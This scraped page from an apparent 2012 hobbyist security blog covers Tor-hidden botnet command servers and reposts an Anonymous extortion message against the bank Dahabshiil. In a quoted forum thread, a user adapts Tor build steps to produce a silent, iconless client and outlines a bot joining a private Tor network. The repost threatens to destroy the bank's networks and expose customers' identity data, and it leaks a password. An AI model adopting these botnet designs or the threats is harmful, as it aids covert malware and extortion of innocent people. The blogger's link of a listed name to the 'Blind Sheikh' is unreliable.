botNet infrastructure in Tor

gATO-  was drawing a –What If– a bot-net talking first to level 1 clearWeb c&c server and they only talk to level 2 in Tor /i2p anonymized network. I included the infection c&c and the bot-distributor separated back to Tor/i2p network. This is all gleamed from information in HackBB in the onion network  –/ Oh yeah I been playing with

steganography encryption/decryption

So the password to the picture is password I used ISteg to embed the message this is a proof of concept that steganography is easy and a cool toy. Oh my public key is on the site you may need it cause I encrypted the encrypted steganography picture that has a code well you get my drift …. yeah ,, yeah

– gAtO oUt

message in picture – steganography  


gAtO’s Twitter Weekly 2012-07-28


gAtO interview -Botnet’s in Tor -sI -Si

gAtO jUsT – finished an interview with Bill Donato from BotRevolt.com. I wanted to post this because these were good questions. My answers were a little lOcO gAtO but I tried anyway here is the Interview, at the bottom I included a conversation about Tor Controlled Botnet I found in HackBB in onion land, all I can tell you the code and how-to are out there –gAtO oUt


LinkedInMr Bill Donato has sent you a message.

Date: 7/26/2012

Subject: RE: Bot Revolt Blog

Hi Richard,
Here are 5 general questions we think our readers would find interesting. We greatly appreciate your feedback!

First Thank you Bill for this opportunity. I have 35 years in IT-and a little security goes with the territory but I’m no expert. I’m retired so I have the freedom to say what I want and I have chosen to support Freedom of Speech in cyberspace. You can find my rants and rages about security at http://uscyberlabs.com/blog I go by twitter @gAtOmAlO2 after my lionhearted cat “named- gato”. my 2 cents “be a critical reader, thinker and cyber user”. truet but verify

• We see a lot of cybercrime targeted at large companies, but how vulnerable is the average consumer in today’s cyber environment?

In todays economic climate cyber criminals see mass unemployment and use that to recruit shipping mules and money mules. Financial desperation and greed is a driving force in recruitment and the FBI is well aware of this a good money mule is hard to find and trust. Also Infection points for zombie computers to do the dirty work goes up and up with every new exploit. Last people don’t know how much information they leak out. With metadata just from the pictures in Facebook a criminal can gleam lot’s of information from the average Facebook update???.//

So to answer your question yes the average consumer needs to be very careful and have common sense. That lost Uncle from Nigeria did not leave you a billion dollars, trust me on this one.

• At the current level of cybercrime’s growth, if it is possible how long before the internet crashes?

Cyber crime is growing but CISPA is not the answer. PII (Personal Identifiable Information) that the government say’s it will not gather just your shopping and search cyber habits, nothing identifiable until you type in the wrong keyword, then your monitored. Then your footsteps in cyberspace will be monitored a bit more closely. The Judicial system now added the cyber forensic phycologist that can produce “minority reports- remember the movie – the though police…”. That’s scary..

Where were you last Tuesday @ 9:37 PM… they know, we are being monitored by the good guy in todays Internet. It’s normal to update my Facebook page or my Linkined profile, leaking data with the metadata from our pictures of our visit to the new office overseas. Can give criminals information for APT attacks.

As to the Internet crashing, I think it’s just beginning. We have Criminals after our data, government after our habits and we have ourself leaking information for everyone to know about me, me, me…. but it’s not crashing —> we have too many me..me..me..

• Cyber warfare is a hot topic, how will a cyber-war affect the countries average citizen?

Have you ever watch your daughter lose her cell phone 5 times in one year, 5 times not one backup. The effects of a cyber kinetic event in the US will happen. I see open scada system in the wild with no protection. Try and report this information that’s a joke and impossible. So many miss-configured scada all running windows OS, with no patch updates or management..// so they become more vulnerable everyday that they don’t upgrade.

Oh make that a tested Update because we (admin type) all stayed up late at nights un-installing an upgrade for -Windows OS- that made the Payroll system -Oracle- not work so NO paychecks….

In other words it will happened because we have a pretty bad security system built into these devices and they are to expensive to replace it’s worth the risk from a financial side so companies ROI return on investment… they did the cost analysis of an attack -they know they will get hacked…Power grid YeaH Baby and we have no backup — but we still come back… the average citizen has to ride it out we have no choice in warfare.
• You talk on your website, uscyberlabs.com, about the rise of botnets running on the tor .onion network, is the tor network a threat to people who do not access it? If so how do users protect themselves?

Botnets in Tor on Yeah! I’m doing some research into botnets in the Tor Black Market and it’s alive and kicking. The Tor hidden service and C&C servers goes hand in hand. You can’t find it, and it can’t be found. We also have i2p as an up and coming secure anonymized network so expect more and more from this area.

I included a post from HackBB-website in the onion network this discussion is about “Tor-Controlled Botnets” I included the code so in Tor there is talk from the hacker world on how to guides to Tor & bonnets. and it’s has a current timestamp.

I’t not just the code it’s also the infrastructure design.

Got to Tor HackBB [1]–  — http://clsvtzwzdgzkjda7.onion/

• On your blog titled “Online Security Basic -should I use encryption” you give some great information. What encryption programs, methods or tips do your recommend for some of the less computer savvy users?

Well first of all here [below] is my public key if you want to send me a message. I use FireVault and encrypt my hard drive, but I forgot my password – that’s my story and I’m sticking to it..;) I use GnuPG. Since I’m not doing skunk work, and I’m not a spy, I try to go open-source type programs, yes they are a little harder to learn but I feel safer with the open aspect of it. In security we have a motto – trust but verify – I can verify these open source program…./

One thing that the average user needs to do is to make their privacy a key part in their cyber life. When you start down the security rabbit hole it’s an active step in your cyber lifestyle.

Privacy is a personal thing, when I’m looking for Preperation H I don’t want Google, Yahoo or Amazon to know about this medical problem, it’s kinda personal, private. But when I’m trolling on Huffington Post it’s another world.



[1] Conversation online in HACKBB website.. about Tor Botnets


[1] Tor-controlled botnet

Re: Tor-controlled botnet

by BotCoder » Fri May 18, 2012 5:50 pm

Good news! I compiled TOR from source and there is no GUI or tray icon if you skip the installer step.

Here are the info to compile from source (you can skip the installer part and build a silent one yourself):



## Instructions for building Tor with MinGW (http://www.mingw.org/)


Stage One:  Download and Install MinGW.


Download mingw:


Download msys:


Download msysDTK:


Install MinGW, msysDTK, and MSYS in that order.

Make sure your PATH includes C:\MinGW\bin.  You can verify this by right

clicking on “My Computer”, choose “Properties”, choose “Advanced”,

choose “Environment Variables”, select PATH.

Start MSYS(rxvt).

Create a directory called “tor-mingw”.

Stage Two:  Download, extract, compile openssl


Download openssl:


Extract openssl:

Copy the openssl tarball into the “tor-mingw” directory.

Type “cd tor-mingw/”

Type “tar zxf openssl-0.9.8l.tar.gz”

(Note:  There are many symlink errors because Windows doesn’t support

symlinks.  You can ignore these errors.)

Make openssl libraries:

Type “cd tor-mingw/openssl-0.9.8l/”

Type “./Configure -no-idea -no-rc5 -no-mdc2 mingw”

Edit Makefile and remove the “test:” and “tests:” sections.

Type “rm -rf ./test”

Type “cd crypto/”

Type “find ./ -name “*.h” -exec cp {} ../include/openssl/ \;”

Type “cd ../ssl/”

Type “find ./ -name “*.h” -exec cp {} ../include/openssl/ \;”

Type “cd ..”

Type “cp *.h include/openssl/”

Type “find ./fips -type f -name “*.h” -exec cp {} include/openssl/ \;”

# The next steps can take up to 30 minutes to complete.

Type “make”

Type “make install”


Stage Three:  Download, extract, compile zlib


Download zlib source:


Extract zlib:

Copy the zlib tarball into the “tor-mingw” directory

Type “cd tor-mingw/”

Type “tar zxf zlib-1.2.3.tar.gz”


Make zlib.a:

Type “cd tor-mingw/zlib-1.2.3/”

Type “./configure”

Type “make”

Type “make install”



Stage Four: Download, extract, and compile libevent


Download the latest libevent release:


Copy the libevent tarball into the “tor-mingw” directory.

Type “cd tor-mingw”

Extract libevent.

Type “./configure –enable-static –disable-shared”

Type “make”

Type “make install”


Stage FiveBuild Tor


Download the current Tor alpha release source code from https://torproject.org/download.html.

Copy the Tor tarball into the “tor-mingw” directory.

Extract Tor:

Type “tar zxf latest-tor-alpha.tar.gz”

cd tor-<version>

Type “./configure”

Type “make”

You now have a tor.exe in src/or/.  This is Tor.

You now have a tor-resolve.exe in src/tools/.


Stage Six:  Build the installer


Install the latest NSIS:


Run the package script in contrib:

From the Tor build directory above, run:


The resulting Tor installer executable is in ./win_tmp/.


gAtOmAlO Public Key-


Version: GnuPG/MacGPG2 v2.0.17 (Darwin)

Comment: GPGTools – http://gpgtools.org





































Profiling a Corporation -metadata attack vector

gAtO sEe – that in todays world getting a corporate profile for an attack plan has become easy thanks due to their own fault. This leads down the road to ruin corporate reputation, stolen IP-Intellectual property, competitive advantage and loss of data. Of course for social activist, criminals, competitor and national governments who use the technology against them to make available unhidden access to your networks. How? 

Metadata Information leaks by the corporation and their employees. According to retrieve information and the metadata in company documents 71% of Forbes 2000 companies may be using vulnerable and out of date version of Microsoft Office and Adobe software that allows hackers to Identify —>

Usernames – emails addresses network details and vulnerable software versions to implement a Advance Persistant Threat (APT).

Metadata in documents that your company distributes constitute information leaks and it can provide all kinds of information to any attacker. The high tech sector publishes more documents across websites than any other industry. Something else your employee on LinkedIn give all kinds of information about your company and your plans, even employment adds can help a potential hacker know what you are doing and maybe design the APT geared towards that subject.

Remember todays cyber attacker have support from lot’s of eye’s and ears, like hacktivist they have many people that can scan your website and look for information that can help the attack. You have 3 different attack vectors to worry about today:

  • IP based attacks
  • Web-Software attacks
  • Information Attacks

Corporate American take care of your metadata or it will bite you hard -gAtO oUt


BitCoin 101

BitCoin 101

Forget most things you’ve heard.  People discover BitCoin in a variety of ways, but usually pick up some sort of misconception like “BitCoin gives free money to people with computers” or “in order to use BitCoin I have to use a program that wastes electricity for nothing” along the way.  Here is a good summary to help you understand BitCoin in general, by focussing on what BitCoin is and what problem it solves.  These two things are not typically well explained on most websites, and it is difficult to appreciate just how effective a technology BitCoin is until they are understood.

What BitCoin is:  An agreement amongst a community of people to use 21 million secure mathematical tokens–“bitcoins”–as money, like traditional African and Asian societies used the money cowry.  Unlike the money cowry:

  • there will never be more bitcoins
  • they are impossible to counterfeit
  • they can be divided into as small of pieces as you want
  • and they can be transferred instantly across great distances via a digital connection such as the internet.

This is accomplished by the use of powerful cryptography many times stronger than that used by banks.  Instead of simply being “sent” coins have to be cryptographically signed over from one entity to another, essentially putting a lock and key on each token so that bitcoins can be securely backed up in multiple places, and so that copying doesn’t increase the amount you own.

Because bitcoins are given their value by the community, they don’t need to be accepted by anyone else or backed by any authority to succeed.

They are like a local currency except much, much more effective and local to the whole world.  As an example of how effective the community is at “backing” the bitcoin: on April 4th 2011 30,000 bitcoins were abruptly sold on the largest BitCoin exchange, consuming nearly all “buy” offers on the order book and dropping the price by nearly 1/3.  But within a couple of days, the price on the exchange had fully rebounded and bitcoins were again trading at good volumes, with large “buy” offers slowly replacing the ones consumed by the trades.  The ability of such a small economy (there were only 5 million out of the total 21 million bitcoins circulating then, or about 3.75 million USD worth at then-current exchange rates) to absorb such a large sell-off without crashing shows that bitcoins were already working beautifully.

What problem BitCoin solves:  Mathematically, the specific implementation of the bitcoin protocol solves the problem of “how to do all of the above without trusting anyone“.  If that sounds amazing, it should!

Normally a local currency has to trust all kinds of people for it to be able to work.

So does a national currency.  And in both cases, that trust is often abused.  But with BitCoin, there’s no one person who can abuse the system.  Nobody can print more money, nobody can re-use the coins simply by making a copy, and nobody can use anyone else’s coins without having direct access to their keys.  People who break its mathematical “rules” simply end up creating a whole different system incompatible with the first.  As long as these rules are followed by someone, the only way BitCoin can fail is for everyone to stop using it.

This marvelous quality of not having to trust anyone is achieved in two ways.  First, through the use of cutting-edge cryptography.

Cryptography ensures that only the owner of the bitcoins has the authority to spend them.  The cryptography used in BitCoin is so strong that all the world’s online banking would be compromised before BitCoin would be, and it can even be upgraded if that were to start to happen.  It’s like if each banknote in your pocket had a 100-digit combination lock on it that couldn’t be removed without destroying the bill itself.  BitCoin is that secure.

But the second way of securing the system, called the blockchain, is where the real magic happens.  The blockchain is a single, authoritative record of confirmed transactions which is stored on the peer to peer bitcoin network.

Even with top-notch digital encryption, if there was no central registry to show that certain bitcoins had already been “paid” to someone else, you could sign over the same coins to multiple people in what’s called a double-spend attack, like writing cheques for more money than you have in your account.  Normally this is prevented by a central authority, the bank, who keeps track of all the cheques you write and makes sure they don’t exceed the amount of money you have.

Even so, most people won’t accept a cheque from you unless they really trust you, and the bank has to spend a lot of money physically protecting those central records, whether they are kept in a physical or digital form.  Not to mention, sometimes a bank employee can abuse their position of trust.  And, in traditional banking, the bank itself doesn’t have to follow the rules you do–it can lend out more money than it actually has.

The blockchain fixes all these problems by creating a single master registry of the already-cryptographically-secured bitcoin transfers, verifying them and locking them down in a highly competitive market called mining.  

In return for this critical role, the BitCoin community rewards miners with a set amount of bitcoins per block, taken from the original limited quantity on a pre-agreed schedule.  As that original amount gradually runs out, this reward will be replaced by fees paid to prioritise one transaction over another–again in a highly competitive market to ensure the lowest possible cost.  The transactions are verified and locked in by the computational work of mining in a very special way so that no one else can change the official record of transactions without doing more computational work than the cumulative work of all miners across the whole network.

In conclusion:  All this mathematical technology may be a bit of a mouthful, but what it means in practice is that BitCoin works just like cash.  Bitcoin transactions are intentionally irreversible–unlike credit cards or PayPal where chargebacks can invalidate a payment that has already been made.  And there are no middlemen.  Transactions are completed directly between the sender and the receiver via the peer to peer network.

Because of BitCoin’s intricate design, the network remains secure no matter where or how you process bitcoin transactions.  Which is incredible–no one else has ever tried to create a system that worked this way!

All previous monetary systems have relied on trusting somebody, whether it was the king, town hall, the federal reserve, or banks.  BitCoin doesn’t.  

It’s guaranteed instead by the laws of mathematics, and that’s why it has everyone from technologists to economists very excited.

More –> https://en.bitcoin.it/wiki/Main_Page


Hacktivist ‘Unlike Us’ Video

This was inevitable. London crew Hacktivist – whose unique, rap driven take on tech metal has been heralded as the arrival of ‘rap djent’ (yes, really) – has unveiled their new video Unlike Us.


Anon iWot Team (Internet War On Terror)

gAtO see – a new twist on Anonymous – They are going after the money trail of terroristDahabshiil International Funds Transfer is their target. This team call’s itself  iWot -“Internet War On Terror” Now the reason gAtO looked carefully at this group is because #1 they are going after bankers –lulz– #2 this is a well though out plan to first show they have the real information before the big data bump. But there is more to this first announcement –

I kind of followed the data and when I saw – BAYD0009016 MOHAMED MURSAL SHEIK A/RAHMAN this is Omar Abdel-Rahman also know as the Blind Sheikh – famed World Trade Center 1993 bombing. and tied to —  (Somali: Maxamed Mursal Sheikh Cabduraxman) is a former deputy district commissioner and Minister of National Assets and Procurement of Somalia –  Well this posting has got my attention.

This list also has CHILDREN’S VIILLAGES of SOMALIA and some other innocent looking people. After looking at some of the names and email and google a few —> this one is real there are some real terrorist on this list. These guy’s have a little class and I like that in a hacktivist. I will have to keep and eye out for this groups they have interesting lulz -gAtO oUt

This new paste  –http://pastebin.com/VqrSV5bG


BY: A GUEST ON JUL 19TH, 2012  |  SYNTAX: NONE  |  SIZE: 11.12 KB  |  HITS: 739  |  EXPIRES: NEVER

After years of offensive hacking against many companies, governments, etc, we [Anonymous], decided to share data related to an internal confidential project from multiple l33t hackers worldwide. We called that “iWot“, meaning “Internet War On Terror“.

Though we will never forget what happened with Megaupload, Pirate Bay, Sopa, friends, etc, our sub-branch of the Anonymous was created with trusted hackers, to follow a specific goal. This email will be the first from us. Thanks to spread our words

We officially declare War on Terror. This is a call for actions of monitoring and/or destruction of companies and institutions that do work with terrorists, rogue countries, etc.

We already broke the security of multiple networks on earth. Each time we will be able to control them, and to steal data, we will then publish our documents on the net, or share them directly to people involved with Newspapers, Justice, etc, worldwide. Some documents, about some banks working with rogue countries, were already shared to some email addresses. And we are quite happy to see that the truth is on its way.. sometimes..

As some of us already explained, we are not a terrorist organization. It’s just that we are fed-up with the fact that our society is loosing time. So we just decided to speed-up actions against terrorists and their friends. We will first try to eradicate the sources of terrorist financing. It is not possible to know at this time the precise scope or the duration of our actions to counter terrorist threats linked to Internet.

Today, as a proof of concept, we will share information about a really evil bank, hiding ugly activities with terrorists. It’s called “Dahabshiil“, an international funds transfer company. Their networks have been broken by different hackers teams for many years. And it’s time for us to share information here in this mail.

Thanks to Wikileaks, secret documents related to Guantanamo detainees publicly explained part of the truth about Dahabshiil. A veteran extremist and a probable associate of Usama Bin Laden, provided direct financial support to Al-Qaeda, Al-Wafa and other terrorist and terrorist support entities through the Somalia-based company Dahabshiil. This bank is currently helping Al-Qaeda, including members of Al-Shabaab.

Despite the fact that the CEO of Dahabshiil tried to get rid of some people, and sometimes people from its own family, this will not be enough for us. We have stolen many many many documents from Dahabshiil. We have destroyed many workstations in Australia, Kenya, USA, UK, Sweden, Somalia, Dubai, Djibouti, etc. We can transfer money from accounts to accounts, despite the stupid security with tokens, passwords, etc. We have modified Windows kernel on many servers and workstations. We have added different kind of cyber-bombs hidden on many workstations and servers. We have powned switches, routers, firewalls, satellite stuff from Telco, etc.

As Dahabshiil members might think we are lying, we have to share data. Feel free to download and copy the data before everything get destroyed, as it’s totally illegal. And now, if Dahabshiil members were unable to understand why the network sometimes crashed, the computers sometimes died, data from internal servers sometimes died, etc, do not search. It was just our actions against you, with people from our team. As an example, we recently destroyed data on the internal LAN in Somaliland, from the Dahabshiil Headquarters (Hargeisa, etc). That’s why you guys, lost Gigs of internal sensitive data on main servers like \\Dahabshiil7, \\Dahabshiil6…

By the way, we also found out that many employees were looking at facebook stuff, personal email, and tons of incredible hardcore porn web sites especially in countries from the Arabian Peninsula, and from the bank (not at home). Also, the password of the account Administrator of the internal LAN in Somaliland, was mainly “Dahab1234”. Awesome. This is how they protect data of their customers. Quite a serious bank. As we have remote 0days against some of their tools, we easily took the control of any workstations there. Then we bounced and bounced, in order to explore this bank. Hopefully, we were a huge number of hackers at the same time, and during months, which helped at stealing sensitive data, spying on end-users and banking transactions, etc. After months and months of fun against these guys who support Terror on earth, we just decided that it was time to destroy them.

This was just the beginning… and just a proof. So from now, dear Dahabshiil members and customers, you can expect a global internal destruction in less than 2 months. You can keep on asking external consultants, even in Europe, about how to install Antivirus, Firewalls, NAC, IPS, Waf, etc. But we will still destroy your networks, steal your data, and sometimes share internal stuff to the public. This is called a sabotage… We had first to be sure that you could not get rid of our offensive tools. That’s why we used two layers of tools. Skilled stuff (with kernel 0dd modifications, etc), and easy tricks (to annoy and to play with your network/data). Now it’s ready. The bombs will kill your networks and your data in less than 2 months. You can also backup the poor data that you still have, but we also infected random Office/PDF documents left, so you’ll just backup some of our bombs, and your network will still die.

If you want us to immediately stop this cyber-sabotage, it’s quite easy. We just ask you to stop lying, to recognize your help with Somalia terror, and to officially change your behavior. We need a public message from you, as a proof. As you might have seen, public excuses of far more bigger banks than Dahabshiil, were done recently, from people who worked with rogue countries, etc. So, we just ask you to do do the same and to change. We will monitor you, as we already made these years. You have 2 months. Maximum. If we see that you are still asking for help against us, to your supposed-to-be IT Security consultants (UK, etc), or if we see that you are trying to clean our stuff in your kernels, etc, we will then launch the cyber-bombs before the 2 months. You don’t have the choice. You have to submit. You have to leave this world of hate, this world of slaughters, this world of killers, and to leave terrorists behind you.

Of course you needed money. Of course most of your employees/customers are not terrorists. Of course most of your employees/customers didn’t know your links with Terror. Of course someone else would have done this in your place. Of course our offensive actions are totally illegal (like yours when you support Terror). But according to us, these reasons are not good reasons. The countdown is already running. It’s too late. You have the choice between living, or dying with honors in the family of people who helped terrorists. You will be our first public example of cyber-destruction, as others already changed their minds. Be smart. Choose life.

And now a message to Dahabshiil customers: if you have money in this bank, if you are a customer of this bank, if you use this bank to transfer money from a country to another, and even if you are not a terrorist, we will let you less than 2 months before we either publish your personal information (passport, ID card, postal address, phone, email, etc), or we destroy your account by moving your money elsewhere, which will not be complex. As an example, we already shared this kind of information, as a proof of capability. Less than 2 months. After that, don’t cry if you lost your money at Dahabshiil, even if they told your that everything was under control (lulz), that they were able to clean their systems (lulz), etc. So, just take your money out of Dahabshiil now (!), and leave them behind you, before the destruction of this unofficial financial support for terrorists. First casualty of war is innocence. Be smart. Choose life.

And now a message to people in the same situation than Dahabshiil: If you are working with terrorists, if you are helping them, if you are linked to them, we will find you, and you will also be destroyed by our cyber-team, sooner or later. There is no place for you on earth. No place for you on Internet. No place for hate. Make love. Make kids. Be smart. Choose life.

We are Anonymous. We are Legion. We do not forgive. We do not forget. Expect us

Anon iWot Team (Internet War On Terror)

Bonus: This is really sad to see that some companies helped Dahabshiil after our intrusions (sometimes from Europe, etc). We won’t reveal the names of these IT Security workers, cause we understood that they just wanted to make money. But, as a last advice for them and their family, thanks to think twice the next time you will help Dahabshiil and terrorists. You are helping people who helped Al-Qaeda, like many other unscrupulous Islamic banks that helped at laundering kind of donations. We know you. You are not anon anymore. *We are Anonymous.*

Credits: though we will hide the identity of the people who helped us, we will at least share our thanks to their organizations, for those who accepted it. So, many many thanks to people from Iomart (!), from Vizada and from Somtel. Some of them accepted to share technical stuff (passwords, remote access, etc) as they do follow our spirit and our values against Terror. *We are legion.*

Contacts: no need to answer to this email address, as it’s not ours. If you want to meet us, as always we’ll be at Defcon soon, and we hope that there will be a special prize for Dahabshiil, though it’s a bit late to propose them to the Powney Awards. We do believe that being an international bank, with really lame security, fake official answers, and real links with terrorists to kill people in Africa, Europe or America (Al-Qaeda), should bring them to a special prize. They deserve it. *We do not forget.*

Future: if you want to participate, just share your thoughts or ideas of targets on Internet with the official related proofs showing links with terrorists. Like any skilled hackers, we can have remote access anywhere on earth (gov, telco, comp, etc) as the current IT Security community is just selling dreams and fake products. If you like our values, thanks to support Anonymous iWot (internet War on terror) and put tags like #anoniwot2012 so that we can find your list of targets, your messages, your help, your ideas, etc. You cannot contact us directly, so, please shout enough so that we can hear you. You can just share message to our teams on public spaces, and we’ll read them. Before that, if you enjoyed our specific actions against terrorists in Somalia, thanks to really show your support about this Somaleaks operation, with the tag #somaleaks and just wait, as many other places might burn sooner or later. *Expect us.* –DATA Dump  http://www.animegist.com/old//Somaleaks/


gAtO’s Twitter Weekly 2012-07-21


Fingerprint Tor or Government Anonymized Network

How To  Fingerprint Anonymized Network visiting your website

gAtO hAs – been learning about the Tor-.onion network and one thing I wanted to understand was how China, Iran and Syria block the Onion-Router (OR). / Fingerprint Profile – I have read in the Tor wiki about the Tor signal simulating a Skypes fingerprint to hide in the clutter of the web. So how do I figure this out? Ok with WireShark I can capture the packets and check out the signature and fingerprint of a Tor anoymized network. This is one way.

Another way – just check out your website statistics and look for anyone that visited your site that does not have a country code.  From  observation of my site uscyberlabs.com I have found a pattern lately most “no country flag” indicates a Tor OR or a private – Anonymized Network. Not all of them are Tor so some of the others are the most interesting because they are anonymized but not Tor, I2P maybe, government networks –mAyBe -sI -nO gAtO is a gAtO let’s check this out

I have a few SEO packages on my site to check out the back-end statistics of the site. This give you information about your web visitor like the referal of the site that you came from, The OS, the platform and the Country were you came from, your geo-Location. One of the things that Tor does for you is prevent people from knowing your IP / geo-location. So guess what??? people have been visiting my site using not just Tor-networks – c00l b3ans, but so what else can I find out about these other  non-Tor relay— so I started digging around and this is what I found about some of these exit-relays… gAtO wArNiNg – I have to hold back some information about governments anonymized networks due to privacy and vulnerabilities possibilities.

A fingerprint of NO COUNTRY FLAGS – on my logs show’s Tor Exit-Relay type anonymized network according to the Visitor statistics: Figure 1(below) a snapshot of my log from ExtremeTracking.com –//  You noticed the ip or names of referred site with no country flags. Example: for-exit0-readme.dfi.se – tor21.anonymizer.ccc.de – and a few more —


I decide to –Trust but Verifythe security Dude’s secret mottomEoW

I went to the command line:

curl tor21.anonymizer.ccc.de   – it came back with information that this exit-relay come’s from the Tor-Project personal relays- and it’s private-relay because I checked it against and guess what it’s hosted by there dear friends Chaos Computer Club – that brings back the “way-back machine” to the old day of real hacking but these are the guy’s from Germany and they are good friends of the Tor project, so this is a trusted Tor exit relay for the Tor project..// interesting // they were reading my “recon the deep web article

curl tor21.anonymizer.ccc.de


<li><a href=”https://www.torproject.org/overview.html“>Tor Overview</a></li>

<li><a href=”https://www.torproject.org/faq-abuse.html“>Tor Abuse FAQ</a></li>

<li><a href=”https://www.torproject.org/eff/tor-legal-faq.html“>Tor Legal FAQ</a></li>


IP – – All (Onion Router) OR from Chaos seem to be – OS window 7

27 Jun, Wed, 14:02:33 tor21.anonymizer.ccc.de uscyberlabs.com/blog/2012/02/05/recon-deep-web/


 I found out all 3 Tor OR-relays had this signature – No Flag Fingerprint = TOR/i2p = secure traffic/anoymized  traffic-

***  –Trust but Verify –/ What caught my attention in the log was is owned by nLayer Communication    — Who is nLayer they provides Internet connectivity solutions. The company provides IP transit, data transportation, and managed networking services to governments agencies. CIA, FBI, NSA any alphabet soup agency that you want from the .gov folks.

How did we get from to nLayer: a traceroute- command

[2] traceroute to (, 64 hops max, 52 byte packets

1 (  11.513 ms  10.851 ms  8.521 ms

2  wwcksysc01-gex0103000.ri.ri.cox.net (  10.120 ms  11.272 ms  7.912 ms

3  ip98-190-33-21.ri.ri.cox.net (  11.896 ms  9.496 ms  12.044 ms

4  provdsrj01-ae3.0.rd.ri.cox.net (  10.429 ms  13.194 ms  11.063 ms

5  nyrkbprj01-ae2.0.rd.ny.cox.net (  18.038 ms  15.177 ms  14.140 ms

6  ae0-50g.cr1.nyc3.us.nlayer.net (  16.279 ms  17.128 ms  17.859 ms

7  xe-7-3-0.cr1.lhr1.uk.nlayer.net (  87.076 ms  83.085 ms  82.096 ms

8  ae1-70g.ar1.lhr1.uk.nlayer.net (  83.856 ms  84.420 ms  85.732 ms

as13335.xe-4-0-6.ar1.lhr1.uk.nlayer.net (  82.774 ms  102.143 ms  82.082 ms

10 (  83.317 ms  83.772 ms  82.424 ms

And of course this all goes thru some dummy corporate stuff to fool anyone // if you dig a little // I guess Global Telecom & Technology, Inc. (“GTT”), (OTCBB: GTLT.OB – // – have you seen their stock almost double since the US government stepped up it’s cyber position- good cyber investment I guess–// ), a global network operator providing managed data services to large enterprise, government and carrier customers in over 80 countries worldwide, today announced the acquisition of privately-held, Chicago-based nLayer Communications, Inc. –government and carrier customers/ government and carrier customers / government and carrier customers…//


So gaTo what does all this mean / a simple website statistics can help you see your anonymized visitors — No Flag Fingerprint = TOR/i2p = secure traffic/anoymized  traffic- / or it could be from a government site -knock, knock, knocking at your website door- also or business spying your site, your information. gAtO think it’s a waste of time because gAtO is wasted most of the time when he writes this stuff- RI MMP program, life sucks big time.

Besides the Tor or I2P  traffic// the pattern in the fingerprint that show no country flag: — secure traffic/anoymized — this is open source software that governments have modified for their own skunk work… Governments have taken the 3rd level Tor-Onion routing (code) and has their own similar network, but under the hood is the same core code – “ no Flag” show’s root code flaw, So any webmaster that has a website can find Tor like Exit-Relays or govs, watching you watching them –

: As long as the visitor is visiting from inside the matrix of a anoymized network they must use and Exit-Node-no country flag GOTCHA—gATO ouT

by the way Chaos Computer Club nice Tor- exit-node


gAtOmAlO lAb nOtEs –=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


traceroute to (, 64 hops max, 52 byte packets

1 (  46.027 ms  12.175 ms  9.976 ms

2  wwcksysc01-gex0103000.ri.ri.cox.net (  15.444 ms  11.472 ms  10.996 ms

3  ip98-190-33-21.ri.ri.cox.net (  10.043 ms  9.272 ms  10.127 ms

4  provdsrj01-ae3.0.rd.ri.cox.net (  9.597 ms  9.633 ms  16.782 ms

5 (  21.272 ms  22.538 ms  21.357 ms

6  ae-6.r21.asbnva02.us.bb.gin.ntt.net (  42.541 ms  50.629 ms  61.680 ms

7  ae-2.r23.amstnl02.nl.bb.gin.ntt.net (  133.403 ms  162.975 ms  137.493 ms

8  ae-2.r02.amstnl02.nl.bb.gin.ntt.net (  136.255 ms  128.778 ms  133.927 ms

9  xe-4-1.r02.dsdfge01.de.bb.gin.ntt.net (  142.335 ms  142.499 ms  141.396 ms

10  xe-3-4.r00.dsdfge02.de.bb.gin.ntt.net (  133.058 ms  128.793 ms *

11 (  132.148 ms  136.187 ms  132.329 ms

12  tor21.anonymizer.ccc.de (  123.563 ms  130.866 ms  121.906 ms —



traceroute to (, 64 hops max, 52 byte packets

1 (  1842.973 ms  9.712 ms  10.324 ms

2  wwcksysc01-gex0103000.ri.ri.cox.net (  9.961 ms  10.751 ms  10.437 ms

3  ip98-190-33-21.ri.ri.cox.net (  12.393 ms  10.226 ms  9.773 ms

4  provdsrj01-ae3.0.rd.ri.cox.net (  19.731 ms  9.270 ms  18.419 ms

5  nyrkbprj01-ae2.0.rd.ny.cox.net (  15.479 ms  15.045 ms  16.067 ms

6  ae0-50g.cr1.nyc3.us.nlayer.net (  15.114 ms  22.195 ms  16.909 ms

7  ae2-70g.cr1.ewr1.us.nlayer.net (  16.976 ms  28.552 ms  15.767 ms

8  xe-3-1-0.cr1.sjc1.us.nlayer.net (  90.901 ms  104.251 ms  90.386 ms

9  ae1-40g.ar2.sjc1.us.nlayer.net (  97.274 ms  91.747 ms  92.165 ms

10  as18779.xe-4-0-4.ar2.sjc1.us.nlayer.net (  91.277 ms  104.404 ms  100.544 ms

11  gw-ao.sjc01.appliedops.net (  98.566 ms  92.947 ms  91.660 ms

12  tor-exit-router35-readme.formlessnetworking.net (  93.154 ms  92.201 ms  92.769 ms



traceroute to (, 64 hops max, 52 byte packets

1 (  19.522 ms  35.384 ms  9.940 ms

2  wwcksysc01-gex0103000.ri.ri.cox.net (  12.016 ms  11.162 ms  9.829 ms

3  ip98-190-33-21.ri.ri.cox.net (  13.815 ms  8.970 ms  9.637 ms

4  provdsrj01-ae3.0.rd.ri.cox.net (  11.118 ms  11.123 ms  9.964 ms

5 (  20.776 ms  20.920 ms  61.446 ms

6  ttc.tenge11-1.br02.ldn01.pccwbtn.net (  95.216 ms  107.984 ms  94.783 ms

7 (  149.863 ms  149.865 ms  149.539 ms

8  vl554-gvrn-sr1.msk1.net.lancronix.ru (  158.159 ms  165.395 ms  157.553 ms (  157.467 ms  157.215 ms  166.376 ms



Are Criminals Using Tor-onion- Controlled Botnet

gAtO aSkEd – are criminals using Tor-.onion network to run botnets?  I started searching in the deep dark web and found some interesting discussion threads. I copied them down from different places in onion land. But a simple search in “the abyss-search engines”— http://nstmo7lvh4l32epo.onion — dark web search engine can let you see a few places were Tor-controlled botnets are being sold, discussed and a place were you can ask questions and get back some real answers since they’re in the .onion.

So this may shed some light on this what hackers and criminals are talking about, and see how the bad guy’s are doing it- I just want to learn. -gAtO oUt 


  • Is there any good reason for a botnet not to contact an onionland server for C&C? It seems like that would make it harder to shut down, since you can’t find the server. What reason am I missing for this not being done more often?
  • This is actually very simple to implement. I’ve been working on a project that does this for a few months that’s pretty much complete.
  • My bot uses a hidden service to pull down a custom torrc, this file contains information on private directory servers which it then uses to connect to a private tor network.
  • The bot can choose weather to stay on the public tor network or connect to a privet network depending on what the C&C tells it to do.
  • If it connects to the private network it does a check to see if the client machine is hosted behind a NAT, if it’s not it becomes a relay and exit node.
